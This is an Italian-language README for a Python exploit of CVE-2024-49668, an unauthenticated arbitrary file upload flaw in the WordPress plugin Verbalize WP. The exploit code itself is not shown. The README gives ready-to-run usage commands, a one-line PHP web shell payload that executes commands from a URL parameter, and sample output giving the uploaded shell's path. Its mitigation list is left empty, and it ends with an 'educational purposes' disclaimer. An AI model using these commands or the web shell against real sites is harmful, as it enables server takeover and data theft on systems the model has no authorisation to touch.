
Plugin WordPress Verbalize WP <= 1.0 - Vulnerabilità di caricamento arbitrario di file
CVE-2024-49668 è una vulnerabilità critica nel plugin WordPress Verbalize WP versione 1.0 e precedenti. Questa vulnerabilità consente ad attaccanti non autenticati di caricare file arbitrari, inclusi web shell, sul server web. Il problema deriva da una validazione insufficiente dell'input e da limitazioni deboli sui tipi di file durante il caricamento.
Questo script Python sfrutta la vulnerabilità CVE-2024-49668 per caricare un file shell sul sito WordPress target utilizzando il plugin Verbalize WP.
readme.txt.requestsInstalla la libreria richiesta usando pip:
pip install requests
usage:
CVE-2024-49668.py [-h] -u URL [-s SHELL]
Esegue una richiesta POST a un sito WordPress.
options:
-h, --help mostra questo messaggio di aiuto ed esce
-u, --url URL URL del target
-s, --shell SHELL Codice shell da caricare
Di default, lo script caricherà una shell PHP che esegue phpinfo().
python CVE-2024-49668.py -u http://target.com
Puoi anche specificare un codice shell PHP personalizzato da caricare:
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi
La vulnerabilità CVE-2024-49668 consente agli attaccanti di ottenere il pieno controllo del server target caricando file dannosi. Lo sfruttamento di questa vulnerabilità può portare a conseguenze gravi, tra cui violazione dei dati, accesso non autorizzato e potenziale deturpazione del sito web.
Per proteggere il tuo sito WordPress da questa vulnerabilità, si raccomanda di:
Questo strumento è destinato esclusivamente a scopi educativi. L'uso non autorizzato di questo strumento contro siti web senza l'esplicita autorizzazione del proprietario è illegale. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.
Creato il 2025-03-22 da Nxploited , Khaled alenazi